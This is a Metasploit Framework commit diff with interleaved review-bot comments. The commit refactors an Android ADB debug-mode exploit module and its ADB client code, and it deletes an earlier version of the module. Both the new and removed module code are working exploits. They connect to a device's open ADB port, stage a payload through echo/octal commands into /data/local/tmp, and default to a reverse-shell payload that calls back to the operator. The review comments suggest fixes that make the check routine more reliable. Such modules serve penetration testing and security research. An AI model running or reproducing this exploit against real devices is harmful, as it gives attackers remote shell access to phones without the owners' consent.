mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Last mile polish and tweaks.

joev 2016-01-02 22:41:38 -06:00
parent 22aae81006
commit dcd36b74db
4 changed files with 23 additions and 100 deletions


@ -28,6 +28,10 @@ class Client
ADB::Message::Close.new(local_id, response.arg0).send_recv(@sock) ADB::Message::Close.new(local_id, response.arg0).send_recv(@sock)
end end
def read_message
ADB::Message.read(@sock)
end
end # Client end # Client
end # ADB end # ADB
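Review bot: The new `read_message` has no comment, and nothing in this hunk says whether `ADB::Message.read(@sock)` blocks until a full message arrives or what it returns when the peer closes the socket. `Message.read` is outside the hunk, so I can only ask: a caller that loops on `read_message` needs to know whether a silent device stalls it forever. I would add `# Reads the next ADB message from the socket (blocking; no timeout is applied here)` above the method once that is confirmed, or pass a timeout through if `Message.read` supports one.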


@ -20,12 +20,6 @@ class Message
attr_accessor :arg1 attr_accessor :arg1
attr_accessor :data attr_accessor :data
def initialize
self.command = self.arg0 = self.arg1 = 0
self.command = self.class::COMMAND if defined?(self.class::COMMAND)
self.data = ""
end
def initialize(arg0, arg1, data) def initialize(arg0, arg1, data)
self.command = self.class::COMMAND if defined?(self.class::COMMAND) self.command = self.class::COMMAND if defined?(self.class::COMMAND)
self.arg0 = arg0 self.arg0 = arg0
@ -101,7 +95,7 @@ class Message
class Connect < Message class Connect < Message
COMMAND = "CNXN" COMMAND = "CNXN"
DEFAULT_VERSION = 0x01000000 DEFAULT_VERSION = 0x01000000
DEFAULT_MAXDATA = 256*1024 DEFAULT_MAXDATA = 4096
DEFAULT_IDENTITY = "host::" DEFAULT_IDENTITY = "host::"
def initialize(version=DEFAULT_VERSION, def initialize(version=DEFAULT_VERSION,
@ -109,6 +103,8 @@ class Message
system_identity_string=DEFAULT_IDENTITY) system_identity_string=DEFAULT_IDENTITY)
super super
end end
end end
class Auth < Message class Auth < Message
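Review bot: `DEFAULT_MAXDATA = 4096` replaces `256*1024` in `Connect` without a comment, and the constant is only what this client advertises to the peer; none of the visible lines show the read path refusing a message whose declared data length is larger. `Message.read` is outside these hunks, so this is a question rather than a finding: if it sizes its read from the length field the device sends, a misbehaving or hostile device can make the client buffer or wait on an arbitrarily large payload. I would document the constant, for example `# Largest payload advertised in CNXN; the reader must reject anything longer`, and enforce the same bound when reading. The `Connect` class is split across two hunks, so its full `initialize` signature is not visible here.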


@ -16,12 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'Android ADB Debug Mode Exec Payload', 'Name' => 'Android ADB Debug Mode Exec Payload',
'Description' => %q{ 'Description' => %q{
Writes and spawns a native shell on an android device that is listening Writes and spawns a native payload on an android device that is listening
for adb debug messages. for adb debug messages.
}, },
'Author' => ['joev'], 'Author' => ['joev'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/reverse_tcp' }, 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
'Platform' => 'linux', 'Platform' => 'linux',
'Arch' => ARCH_ALL, 'Arch' => ARCH_ALL,
'Targets' => [ ['Automatic', {}] ], 'Targets' => [ ['Automatic', {}] ],
@ -36,28 +36,23 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
begin setup_adb_connection do
connect device_info = @adb_client.connect.data
device_info = adb_client.connect
print_good "Detected device:\n#{device_info}" print_good "Detected device:\n#{device_info}"
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
ensure
disconnect
end end
Exploit::CheckCode::Unknown Exploit::CheckCode::Unknown
end end
def execute_command(cmd, opts) def execute_command(cmd, opts)
response = adb_client.exec_cmd(cmd) response = @adb_client.exec_cmd(cmd)
print_good "Command executed, response:\n #{response}" print_good "Command executed, response:\n #{response}"
end end
def exploit def exploit
begin setup_adb_connection do
print_status "Connecting to device..." device_data = @adb_client.connect
connect
device_data = adb_client.connect
print_good "Connected to device:\n#{device_data.data}" print_good "Connected to device:\n#{device_data.data}"
execute_cmdstager({ execute_cmdstager({
:flavor => :echo, :flavor => :echo,
@ -65,13 +60,18 @@ class Metasploit3 < Msf::Exploit::Remote
:prefix => '\\\\0', :prefix => '\\\\0',
:temp => datastore['WritableDir'] :temp => datastore['WritableDir']
}) })
end
end
def setup_adb_connection(&blk)
begin
print_status "Connecting to device..."
connect
@adb_client = Rex::Proto::ADB::Client.new(sock)
blk.call
ensure ensure
disconnect disconnect
end end
end end
def adb_client
@adb_client ||= Rex::Proto::ADB::Client.new(sock)
end
end end
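Review bot: In `check`, the trailing `Exploit::CheckCode::Unknown` is unreachable, because the block given to `setup_adb_connection` either returns `Exploit::CheckCode::Vulnerable` or raises; a refused or timed-out connection therefore surfaces as an exception instead of a check code. A method-level `rescue ::Rex::ConnectionError` placed before that final line would restore the intended fallback. The block also reports `Vulnerable` for any reply at all: `Client#connect` is not visible here, but if it can return an `Auth` message (that class exists in the message file of this commit), the device is asking for authorization and is being reported as exposed when it is not, so the reply's `command` should be compared with `"CNXN"` before printing `device_info`. As a style point, `setup_adb_connection` does not need the inner `begin`, since `ensure` can attach to the `def` directly, and `yield` would replace `&blk` / `blk.call`.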


@ -1,77 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/adb/client'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Android ADB Debug Mode Shell Access',
'Description' => %q{
Writes and spawns a native shell on an android device that is listening
for adb debug messages.
},
'Author' => ['joev'],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/reverse_tcp' },
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 2016'
))
register_options([
Opt::RPORT(5555),
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
], self.class)
end
def check
begin
connect
device_info = adb_client.connect
print_good "Detected device:\n#{device_info}"
return Exploit::CheckCode::Vulnerable
ensure
disconnect
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
response = adb_client.exec_cmd(cmd)
print_good "Command executed, response:\n #{response}"
end
def exploit
begin
print_status "Connecting to device..."
connect
device_data = adb_client.connect
print_good "Connected to device:\n#{device_data.data}"
execute_cmdstager({
:flavor => :echo,
:enc_format => :octal,
:prefix => '\\\\0',
:temp => datastore['WritableDir']
})
ensure
disconnect
end
end
def adb_client
@adb_client ||= Rex::Proto::ADB::Client.new(sock)
end
end